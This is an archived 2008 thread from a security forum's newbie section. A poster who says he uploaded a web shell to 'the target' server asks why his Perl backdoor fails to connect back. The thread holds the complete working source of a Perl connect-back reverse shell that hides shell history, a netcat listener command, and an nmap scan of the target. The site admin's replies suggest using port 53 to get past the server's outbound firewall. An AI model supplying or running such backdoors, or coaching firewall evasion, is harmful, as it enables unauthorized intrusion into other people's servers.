Waraxe IT Security Portal
Login or Register
November 24, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 65
Members: 0
Total: 65
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> Need HELP, perl reverse shell .....
Post new topicReply to topic View previous topic :: View next topic
Need HELP, perl reverse shell .....
PostPosted: Sun Nov 23, 2008 1:33 pm Reply with quote
hottox
Regular user
Regular user
Joined: Nov 23, 2008
Posts: 19




Hi everybody,
so, this is my probleme, i uploaded a shell on a server, then i uploaded a perl backdoor "chmod 0755",
script:
Code:
#!/usr/bin/perl
use IO::Socket;
#cONNECT BACKDOOR EDITED BY XORON
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(xoron) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF


i run netcat:
Code:
nc -vv -l -p 2121

then, via the php shell:
Code:
perl dc.pl [My ip] [port]


and the result : Unable to Connect Host.

I tested the script on the localhost and I had a shell,
i need your help to solve that problem.
Waiting for reply Very Happy
View user's profile Send private message Send e-mail MSN Messenger
PostPosted: Sun Nov 23, 2008 1:51 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




This can be firewalling issue on webserver's side. Try common ports like 53,80, ...
And are you sure that your port 2121 is open on your side? No firewall? No router/NAT between? Maybe you need port forward. I suggest to run NC in listening mode on your PC and then use some online port scanner and see, if your open port is reachable from the Internet.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Nov 23, 2008 2:00 pm Reply with quote
hottox
Regular user
Regular user
Joined: Nov 23, 2008
Posts: 19




here is the result of Intense scan, all TCP ports,with nmap:
Code:
PORT STATE SERVICE VERSION

20/tcp closed ftp-data

21/tcp open ftp PureFTPd

|_ FTP bounce check: no banner

22/tcp open ssh OpenSSH 3.9p1 (protocol 2.0)

25/tcp open smtp Exim smtpd 4.69

26/tcp open smtp Exim smtpd 4.69

53/tcp closed domain

80/tcp open http Apache httpd 2.2.9 ((Unix) mod_ssl/2.2.9 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635)

|_ HTML title: HostMonster - Web hosting

110/tcp open pop3 Dovecot pop3d

|_ POP3 Capabilites: USER CAPA RESP-CODES UIDL PIPELINING STLS TOP SASL(PLAIN)

113/tcp closed auth

143/tcp open imap Dovecot imapd

443/tcp open ssl/http Apache httpd 2.2.9 ((Unix) mod_ssl/2.2.9 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635)

465/tcp open ssl/smtp Exim smtpd 4.69

|_ SSLv2: server still supports SSLv2

993/tcp open ssl/imap Dovecot imapd

|_ SSLv2: server still supports SSLv2

995/tcp open ssl/pop3 Dovecot pop3d

|_ SSLv2: server still supports SSLv2

1167/tcp closed unknown

2077/tcp open unknown

2078/tcp open ssl/unknown

|_ SSLv2: server still supports SSLv2

2082/tcp open http cPanel httpd 11.23.6

| HTTP Auth: HTTP Service requires authentication


|_ Auth type: Basic, realm = cPanel

|_ HTML title: cPanel® 11

2083/tcp open ssl/http cPanel httpd 11.23.6

|_ SSLv2: server still supports SSLv2

|_ HTML title: cPanel® 11

| HTTP Auth: HTTP Service requires authentication


|_ Auth type: Basic, realm = cPanel

2084/tcp open http cPanel EntropyChat httpd 0.2.6

|_ HTML title: Site doesn't have a title.

|_ robots.txt: is empty or has no disallowed entries

2085/tcp closed unknown

2086/tcp open http cPanel httpd 11.23.6

|_ HTML title: cPanel® 11

| HTTP Auth: HTTP Service requires authentication


|_ Auth type: Basic, realm = Web Host Manager

2087/tcp open ssl/http cPanel httpd 11.23.6

|_ SSLv2: server still supports SSLv2

|_ HTML title: cPanel® 11

| HTTP Auth: HTTP Service requires authentication


|_ Auth type: Basic, realm = Web Host Manager

2088/tcp closed unknown

2089/tcp closed unknown

2090/tcp closed unknown

2091/tcp closed unknown

2092/tcp closed unknown

2093/tcp closed unknown

2094/tcp closed unknown

2095/tcp open http cPanel httpd 11.23.6

|_ HTML title: cPanel® 11

| HTTP Auth: HTTP Service requires authentication


|_ Auth type: Basic, realm = WebMail

2096/tcp open ssl/http cPanel httpd 11.23.6

|_ SSLv2: server still supports SSLv2

|_ HTML title: cPanel® 11

| HTTP Auth: HTTP Service requires authentication


|_ Auth type: Basic, realm = WebMail

2097/tcp closed unknown

6666/tcp closed irc

8082/tcp closed blackice-alerts

8083/tcp closed unknown

8585/tcp closed unknown

8586/tcp closed unknown

19638/tcp closed unknown
Code:
View user's profile Send private message Send e-mail MSN Messenger
PostPosted: Sun Nov 23, 2008 2:14 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




What computer did you scan? Webserver? I meant your own PC, where NC is in listening mode.

http://www.emule-project.net/home/perl/general.cgi?rm=porttest&tcpport=2121
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Nov 23, 2008 2:28 pm Reply with quote
hottox
Regular user
Regular user
Joined: Nov 23, 2008
Posts: 19




it's the target's scan,
port is open, and the firewall is disabled,
View user's profile Send private message Send e-mail MSN Messenger
PostPosted: Sun Nov 23, 2008 2:35 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




If you are sure, that your PC can be reached from Internet, then try to use TCP port 53 instead of 2121. Because webserver needs this port for outgoing DNS requests, then it may be useable for your intentions. That's if target's network-level security is not tighter.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Nov 23, 2008 3:13 pm Reply with quote
hottox
Regular user
Regular user
Joined: Nov 23, 2008
Posts: 19




here is some information about the target:

Software: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635. PHP/5.2.6

Code:
System Info: Linux 2.6.27-6_1.intel.BHsmp #1 SMP Thu Nov 13 15:27:29 MST 2008
x86_64
Disabled functions: NONE
cURL: ON
Register globals: OFF
MySQL: ON
MSSQL: OFF
PostgreSQL: ON
Oracle: OFF

Safe-mode: OFF (not secure)


[/code]

??????????????????????
View user's profile Send private message Send e-mail MSN Messenger
Need HELP, perl reverse shell .....
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.044 Seconds